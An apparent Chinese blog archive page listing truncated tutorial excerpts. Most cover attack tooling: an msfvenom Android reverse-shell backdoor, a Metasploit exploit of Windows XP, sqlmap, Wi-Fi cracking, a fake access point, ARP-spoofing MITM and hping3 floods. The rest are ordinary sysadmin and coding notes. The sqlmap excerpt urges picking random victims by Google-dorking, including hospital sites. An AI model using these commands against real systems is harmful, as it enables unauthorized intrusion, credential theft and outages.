04 2017 档案
摘要:文本演示怎么使用Kali Linux入侵Android手机。Kali Linux IP地址:192.168.0.112;接收连接的端口:443。同一局域网内android手机一部(android 5.1)创建一个后门程序在终端中执行:# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=443 > my_ba...
阅读全文
摘要:我使用Kali Linux的IP地址是192.168.0.112;在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑。本文演示怎么使用Metasploit入侵windows xp sp3。启动msfconsole:# msfconsole选择一个漏洞:msf > search platform: windows xp sp3 exploit/windows/smb...
阅读全文
摘要:Metasploit可以在Linux、Windows和Mac OS X系统上运行。我假设你已安装了Metasploit,或者你使用的系统是Kali Linux。它有命令行接口也有GUI接口。我使用的系统是Kali Linux,本文以这个系统为例。图形用户界面接口:Armitage命令行接口:msfconsolemsfconsole使用metasploit的基本步骤:运行msfconsole确定远程...
阅读全文
摘要:Lynis是Linux平台上的一款安全漏洞扫描工具。它可以扫描系统的安全漏洞、收集系统信息、安装的软件信息、配置问题、没有设置密码的用户和防火墙等等。Lynis是流行可靠的安全扫描工具。前不久,Lynis更新了版本,Lynis发布了2.2.0。在这个版本上增加了新的特性和一些小的功能提升。我建议使用Lynis的最新版本2.2.0。下面我在Ubuntu上安装Lynis 2.2.0。安装LynisLy...
阅读全文
摘要:Metasploit提供了很多辅助的模块,非常实用。今天介绍一个叫search_email_collector的模块,它的功能是查找搜索引擎(google、bing、yahoo),收集和某个域名有关的邮箱地址。使用步骤:启动msfconsole:# service postgresql start# msfconsole搜索模块:msf > search gather auxiliary找到sea...
阅读全文
摘要:nmap-Network Mapper,是著名的网络扫描和嗅探工具包。他同样支持Windows和OS X。扫描开放端口和判断操作系统类型先让我们ping一段地址范围,找到启动的主机:# nmap -sP 159.203.205.0-100使用SYN扫描探测操作系统类型:# nmap -sS 159.203.205.61 -O扫描开放端口:# nmap -sV 159.203.205.61 -A扫描...
阅读全文
摘要:Kali Linux默认并没有安装SSH服务,为了实现远程登录Kali Linux,我们需要安装SSH服务。安装 OpenSSH Server# apt-get install openssh-server配置SSH服务开机启动# update-rc.d -f ssh remove# update-rc.d -f ssh defaults# update-rc.d -f ssh enable 2 ...
阅读全文
摘要:Slowhttptest是一个依赖于实际HTTP协议的Slow HTTP DoS攻击工具,它的设计原理是要求服务器所有请求被完全接收后再进行处理。SlowHTTPTest是一款对服务器进行慢攻击的测试软件,所谓的慢攻击就是相对于cc或者DDoS的快而言的,并不是只有量大速度快才能把服务器搞挂,使用慢攻击有时候也能到达同一效果。slowhttptest包含了之前几种慢攻击的攻击方式,包括slowlo...
阅读全文
摘要:我这里使用的Kali Linux,它默认安装了WPScan。在使用WPScan之前,先更新它的漏洞数据库:# wpscan –update扫描wordpress用户wpscan -–url [wordpress网址] –-enumerate u以我的网站为例:# wpscan --url http://blog.topspeedsnail.com --enumerate u注意:要用使用两个–,否...
阅读全文
摘要:sqlmap是开源的SQL注入自动攻击工具,它可以自动的探测SQL注入点并且进一步控制网站的数据库。Kali Linux默认安装了这个工具。找到潜在的攻击目标第一步是找到有SQL注入漏洞的网站。如果你没有特定攻击目标,可以使用Google搜索 php?id=1 (或php?id= + xx系医院):找到结果中的url:http://www.test.com/index.php?id=1检测是否有S...
阅读全文
摘要:HTTrack可以克隆指定网站-把整个网站下载到本地。可以用在离线浏览上,也可以用来收集信息(甚至有网站使用隐藏的密码文件)。一些仿真度极高的伪网站(为了骗取用户密码),也是使用类似工具做的。Kali Linux默认安装了HTTrack。HTTrack帮助:# httrack --help使用示例:# httrack http://topspeedsnail.com -O /tmp/topspee...
阅读全文
摘要:RDP是远程桌面协议。$ nmap your_targetStarting Nmap 7.01 ( https://nmap.org ) at 2016-09-20 17:29 CSTNmap scan report for ns514636.ip-192-95-xx.net (192.95.xx.xx)Host is up (0.28s latency).Not shown: 988 close...
阅读全文
摘要:pdfcrack是破解PDF保护密码的Linux命令行工具。安装pdfcrackDebian系列:# apt install pdfcrack暴力破解# pdfcrack -f filename.pdf -n 6 -m 8 -c 0123456789暴力破解密码是漫长单调的过程。上面使用的参数解释:-n:密码最短多少个字符-m:密码最长多少个字符-c:使用的字符集更多选项,查看帮助:# man p...
阅读全文
摘要:Hydra是非常高效的网络登录破解工具,它可以对多种服务程序执行暴力破解(SSH、VNC等等)。防止这种攻击其实很容易,方法很多。以SSH为例:Ubuntu:使用Port Knocking隐藏SSH端口在Ubuntu中用Fail2Ban保护SSHCentOS 7安装使用Fail2Ban保护SSHDebian使用Fail2Ban和Tinyhoneypot增加网络安全Kail Linux有一个的GUI...
阅读全文
摘要:文本仅供学习交流。我使用的系统是macbook pro 15:安装aircrack-ng使用homebrew安装,命令:brew install aircrack-ng抓包-抓取带密码的握手包macbook自带了一个wifi工具:airport。sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Cu...
阅读全文
摘要:WEP是无线路由器最初广泛使用的一种加密方式,这种加密方式非常容易被破解。目前很少有人使用wep加密方式,但是还是会有。建议:使用WPA/WPA2做为加密方式。抓包和“破解wpa/wpa2”方法一样,参考其中的前4步5) 加快Beacons和Data数据的收集速度和破解WPA/WPA2不同的是,它只要抓取到足够的Beacons和Data数据就可以破解,理想情况下是100000+。你可以等,也可以使...
阅读全文
摘要:Kali Linux能做很多事,但是它主要以渗透测试及’破解wifi密码’闻名。如果你使用Macbook 请看 使用macbook破解WPA/WPA2 wifi密码要求:安装有Kali Linux的计算机支持监控模式的网卡,笔记本电脑一般都支持字典文件时间和耐心这种攻击需要字典文件,一个好的字典至关重要。我以Kali Linux自带的rockyou字典为例,位于/user/share/wordli...
阅读全文
摘要:来自wikipeida:Wi-Fi保护设置(简称WPS,全称Wi-Fi Protected Setup)是一个无线网络安全标准,旨在让家庭用户使用无线网络时简化加密步骤。此标准由Wi-Fi联盟(Wi-Fi Alliance)于2006年制定。在2011年12月28日安全专家Stefan Viehbock报出此标准的一个重大安全漏洞,此漏洞允许远程攻击者使用暴力攻击在几小时内就能获取WPS的PIN码...
阅读全文
摘要:全世界,现在大约50%的网站没有使用SSL加密,天朝尤其多。我们都知道通过HTTP发送的数据都是明文,没有使用任何加密,即使是在数据敏感的登录页面。本文的目的是:如果你在不熟悉的网络环境中,要注意提高警惕。没有人希望自己的密码暴露给他人,so,不要嗅探(狗)他人的密码。想象有一个攻击者坐在某个咖啡馆里,桌子上放着他的笔记本电脑并连着咖啡馆的免费wifi。这个家伙就可以非常容易的获得网络里通信信息。...
阅读全文
摘要:本帖介绍怎么创建假的wifi热点,然后抓取连接到这个wifi用户的敏感数据。我们还会给周围的无线路由器发送未认证的包,使这些路由器瘫痪,强迫用户连接(或自动连接)我们创建的假wifi热点。这种攻击也叫”水坑攻击”-把其他用户都聚集到一个”坑”中。系统要求:Kali Linux本地有线网络连接(网络接口 eth0)无线网卡支持包注入模式和监控模式 (网络接口 wlan0)各种抓包工具-Wiresha...
阅读全文
摘要:中间人攻击也叫Man-In-The-Middle-Attack。我假设你已经知道中间人攻击的基本概念,引用一段wikipedia:中间人攻击(Man-in-the-middle attack,缩写:MITM)是指攻击者与通讯的两端分别建立独立的联系,并交换其所收到的数据,使通讯的两端认为他们正在通过一个私密的连接与对方直接对话,但事实上整个会话都被攻击者完全控制。在中间人攻击中,攻击者可以拦截通讯...
阅读全文
摘要:ettercap是执行ARP欺骗嗅探的工具,通常用它来施行中间人攻击。我还介绍过另一个arp欺骗工具-arpspoof我使用的是Kali Linux 2.0;在开始使用ettercap之前,先配置一下:编辑配置文件/etc/ettercap/etter.conf:# vim /etc/ettercap/etter.conf找到privs一段,改为:ec_uid = 0 ...
阅读全文
摘要:最近读了一篇有关arp欺骗和中间人攻击的文章,于是乎就想着自己实现一下,顺便验证下微信在回话劫持后的安全性。1.本机环境Macbook Air:OS X 10.11 El Captain2.推荐工具Nmap(网络探测工具和安全/端口扫描器)$ brew install nmapEttercap(arp欺骗和dns欺骗工具)$ brew install ettercap –with-gtk+Drif...
阅读全文
摘要:集线器、交换机和路由器都是计算机网络设备,而且非常容易混淆。那么集线器、交换机和路由器有什么区别呢?用简单的话说,就是智商高低。路由器最智能、集线器最傻。集线器、交换机和路由器都允许你把一个或多个计算机连接到其他计算机、网络设备等。每个都有多个网络接口,允许你插入网线接入网络,但是内部原理不同。下面我们分别看一下这些设备。集线器集线器的英文是hub,它是这三个设备中最便宜、最简单的网络设备。它的工...
阅读全文
摘要:DDoS攻击是常见的攻击方式,每小时大约发生28次。http://www.digitalattackmap.com提供在世界范围内的DDoS实时攻击分布图:从DDoS攻击的地图上就可以看出国际形势;例如,到9月18号可以看到日本-中国的攻击;川普宣布建墙之后,可以看到墨西哥-美国的攻击。使用hping3进行DoS攻击:# hping3 -c 10000 -d 120 -S -w 64 -p 80 ...
阅读全文
摘要:以下key来源于微软官网:https://technet.microsoft.com/en-us/library/jj612867.aspxWindows Server 2016操作系统KMS激活序列号Windows Server 2016 DatacenterCB7KF-BWN84-R7R2Y-793K2-8XDDGWindows Server 2016 StandardWC2BQ-8NRM3-...
阅读全文
摘要:服务器地址:kms.luody.info更新:脚本维护更新:2016-09-29服务端版本:vlmcsd-1108-2017-01-19-Hotbird64服务作用:在线激活windows和office适用对象:VOL版本的windows和office适用版本:截止到win10和office2016的所有版本服务时间:24H,偶尔更新维护优点:在线激活 省时省力 无需安装软件 干净环保 命令简单缺...
阅读全文
摘要:导入sql文件在MySQL命令行中中直接导入*.sql脚本,在mysql中执行sql文件的命令: mysql> source /root/db.sql;增加用户格式:grant select on 数据库.* to 用户名@登录主机 identified by "密码" 例1、 增加一个用户test1密码为abc,让他可以在任何主机上登录,并对所有数据库有查询、插入、修改、删除的权限。 ...
阅读全文
摘要:模板语法with关键字type u struct { Name string Age int Sex string } user:=&u{Name:"asd",Age:20,Sex:"mal"} data["user"]=user c.HTML(http.StatusOK, "index.html", data)输出 {{wi...
阅读全文
摘要:本文献给对git很迷茫的新手,注意是新手,但至少会点基本操作,有点基本概念的新手,我不会从怎么用github和git是什么开始讲的。如果作为新手你看书又看不进去,原理又太复杂,又没有直接了当告诉我们怎么给项目贡献代码,和项目同步代码的大体流程。于是我快速写了这么个东西。一来整理下自己混乱的思路,二来想号召大家一起用git开发点东西,可是好几个同鞋只会寂寞的给自己push。我先说下 我之前对gith...
阅读全文
摘要:Markdown是什么?Markdown是一种轻量级标记语言,它以纯文本形式(_易读、易写、易更改_)编写文档,并最终以HTML格式发布。 Markdown也可以理解为将以MARKDOWN语言编写的语言转换成HTML内容的工具,最初是一个perl脚本_Markdown.pl_。 谁发明了这么个东西?它由Aaron Swartz和John Gruber共同设计,Aaron Swartz就...
阅读全文
摘要:小程序: 行家看看年前,公司开发了微信小程序,我负责后端开发,其中遇到一些坑,分享一下小程序语音录制和播放微信录音不能计时,需要自己计时录音文件是微信独有格式,只能微信本身播放,否则需要工具转换为Mp3等通用格式才可以录音播放不能直接用标签src引入,需要将语音文件下载到本地后才可以正常播放。录音播放没有播放完成的事件,需要自己计时### 小程序视频录制和播放视频录制很费空间视频需要压缩再上传,否...
阅读全文
摘要:经常遇到这样的情况:系统自带的 Python 是 2.6,自己需要 Python 2.7 中的某些特性;系统自带的 Python 是 2.x,自己需要 Python 3.x;此时需要在系统中安装多个 Python,但又不能影响系统自带的 Python,即需要实现Python 的多版本共存。pyenv 就是这样一个 Python 版本管理器。安装 pyenv在终端执行如下命令以安装 pyenv 以及...
阅读全文
摘要:你可以用pip导出你的dependency:$ pip freeze > requirements.txt然后在通过以下命令安装dependency:pip install -r requirements.txt使用 setuptools 来安装使用 buildout 进行构建下面具体说下这两点setuptools 的官方文档在这 setuptools - The PEAK Developers'...
阅读全文
摘要:Python2环境首先,我们用pip安装virtualenv:pip3 install virtualenv然后,假定我们要开发一个新的项目,需要一套独立的Python运行环境,可以这么做:第一步,创建目录:Mac:~ michael$ mkdir myprojectMac:~ michael$ cd myproject/Mac:myproject michael$第二步,创建一个独立的Pytho...
阅读全文
摘要:最近有个奇葩要求 要项目中的N行代码 申请专利啥的然后作为程序员当然不能复制粘贴 用代码解决。。使用python-docx读写docx文件环境使用python3.6.0首先pip安装python-docxpip install python-docx然后下面是脚本 修改目录,这里默认取脚本运行目录下的src文件夹取.cs后缀的所有文件 读取并保存为docx有一点需要注意,如果文件中有中文,请用v...
阅读全文
摘要:16.04源deb http://mirrors.aliyun.com/ubuntu/ xenial main restricted universe multiversedeb http://mirrors.aliyun.com/ubuntu/ xenial-security main restricted universe multiversedeb http://mirrors.aliyun...
阅读全文
摘要:查看硬盘:# fdisk -l...Disk /dev/sdb: 274.9 GB, 274877906944 bytes255 heads, 63 sectors/track, 33418 cylinders, total 536870912 sectorsUnits = sectors of 1 * 512 = 512 bytesSector size (logical/physica...
阅读全文
摘要:安装前的准备您必须将这些库 perl 5.6.1+, libreadline, libpcre, libssl安装在您的电脑之中。 对于 Linux来说, 您需要确认使用 ldconfig 命令,让其在您的系统环境路径中能找到它们。Debian 和 Ubuntu 用户推荐您使用 apt-get安装以下的开发库:apt-get install libreadline-dev libncurses5-...
阅读全文
摘要:安装 rbenvgit clone git://github.com/sstephenson/rbenv.git ~/.rbenv# 用来编译安装 rubygit clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build# 用来管理 gemset, 可选, 因为有 bundler 也没什么必要git ...
阅读全文
摘要:安装nginx首先更新软件包 并且安装nginxsudo apt-get updatesudo apt-get install nginx开放防火墙配置sudo ufw allow 'Nginx HTTP'查看防火墙状态sudo ufw status------------------Status: activeTo Action From...
阅读全文
摘要:16.04有很多好处。在此不说了这几天来回折腾了各种的云,然后发现国内的都没有16.04 但是ubuntu可以直接在线升级在此记下来升级的过程 不管是腾讯云也好 阿里云也好,或者别的什么云,只要是国内的 几乎都不提供ubuntu16.04的镜像,但是我们可以在线升级下面是过程记录1. 买vps装ubuntu14.04怎么买? 这个就不说 要是都不会买 还是去玩LOL吧下面是重点如果你是阿里云 那...
阅读全文
摘要:切换到 PHP 7 之后,网站的速度大幅提升,不过通常的扩展可能某一个就还没有支持 PHP7Memcached比如说我现在使用了最新的 Ubuntu 16.04,虽然内置了 PHP 7 源,但 memcached 就还没有,不过好在,它已经支持了 PHP 7 ,只是没有源而已,我们手动编译它。要安装 memcached,需要先安装依赖库 libmemcached从这里找到最新的 libmemcac...
阅读全文
摘要:线上需要一个https的透明代理,开始打算用nginx,调试了一段时间发现配置较复杂且没有成功。后来用的tinyproxy做的透明代理。安装配置过程就是下载、解压、编译、安装、配置、启动一波流:安装依赖sudo apt-get install asciidoc下载sudo wget https://github.com/tinyproxy/tinyproxy/releases/download/1...
阅读全文
摘要:检查安装依赖程序yum install gcc-c++yum install -y tclyum install wget获取安装文件wget http://download.redis.io/releases/redis-2.8.13.tar.gz解压文件tar -xzvf redis-2.8.19.tar.gzmv redis-2.8.19 /usr/local/redis进入目录cd /us...
阅读全文
摘要:以下會示範在 Debian, Ubuntu 及 LinuxMint 分別安裝 MySQL 5.7, 5.6, 5.5 的方法。首先按照需要的安裝的 MySQL 版本, 加入相應的 Repository, 然後用 apt-get 安裝 MySQL:1+ MySQL 5.7$ sudo apt-get install software-properties-common$ sudo add-apt-r...
阅读全文
摘要:第一步 安装最新版本的nginx对于ubuntu16.04而言 直接装就是最新的```sudo apt-get updatesudo apt-get install nginx查看Nginx版本sudo nginx -v16.04默认应该是nginx version: nginx/1.10.0 (Ubuntu)```第二部 修改服务器配置配置文件/etc/nginx/sites-available...
阅读全文
摘要:今天看到一个朋友在github上面的issue大概问题就是怎么在不同的电脑上面使用git有个这么个东西Submoudle中文叫做子模块具体使用教程看这里Git-工具-子模块这里只说怎么搞hexo多主题切换和换电脑啥的开始首先分两种情况1. 主题的出了配置文件 或者其他文件没有DIY过,都是直接clone原来的主题作者的2. 主题的CSS JS 文件自己改过没有修改主题源码如果没有修改主题源码那就按...
阅读全文
摘要:本文转载自不蒜子不如静态网站建站现在有很多快速的技术和平台,但静态是优点也有缺点,由于是静态的,一些动态的内容如评论、计数等等模块就需要借助外来平台,评论有“多说”,计数有“不蒜”!>“不蒜子”与百度统计谷歌分析等有区别:“不蒜子”可直接将访问次数显示在您在网页上(也可不显示);对于已经上线一段时间的网站,“不蒜子”允许您初始化首次数据。。普通用户据只需两步走:一行脚本+一行标签,搞定一切安装脚本...
阅读全文
摘要:虽然我是搞asp.net的 但是十分欣赏php,php有很多开源的博客程序 比如大名鼎鼎的Wordpress.还有各种独立博客大牛使用的z-blog,以及短小精悍的emblog。 wordpress臃肿不堪,pass!其他的不喜欢,所以就选择国人开发的typecho开源博客系统,优点就是简单好用,支持markdown。 安装typecho需要php环境,这里我使用的是lnmp,服务器采用Vul...
阅读全文
摘要:我的博客主题是直接fork原作者的,所以当原作者更新之后,我要合并冲突,跟随更新下面说一下简单的方法,算是自己做个笔记给主题的fork加一个remote给 fork 配置一个 remote使用 git remote -v 查看远程状态➜ next git:(master) git remote -vorigin git@github.com:luodaoyi/hexo-theme-next.g...
阅读全文
摘要:自己经常用,做个备份VS2012Microsoft Visual Studio Ultimate 2012 旗舰版有效注册密钥:YKCW6-BPFPF-BT8C9-7DCTH-QXGWCMicrosoft Visual Studio Premium 2012 高级版有效注册密钥:MH2FR-BC9R2-84433-47M63-KQVWCMicrosoft Visual Studio Profess...
阅读全文
摘要:代码如下Stream req = Request.InputStream;req.Seek(0, System.IO.SeekOrigin.Begin);string json = new StreamReader(req).ReadToEnd();
阅读全文
摘要:# identity数据库 ## 创建空数据库 交给ef管理 ### 添加asp.net identity包 ``` Install-Package Microsoft.AspNet.Identity.EntityFramework Install-Package Microsoft.AspNet.Identity.OWIN Install-Package Microsoft.Owin.Host...
阅读全文
浙公网安备 33010602011771号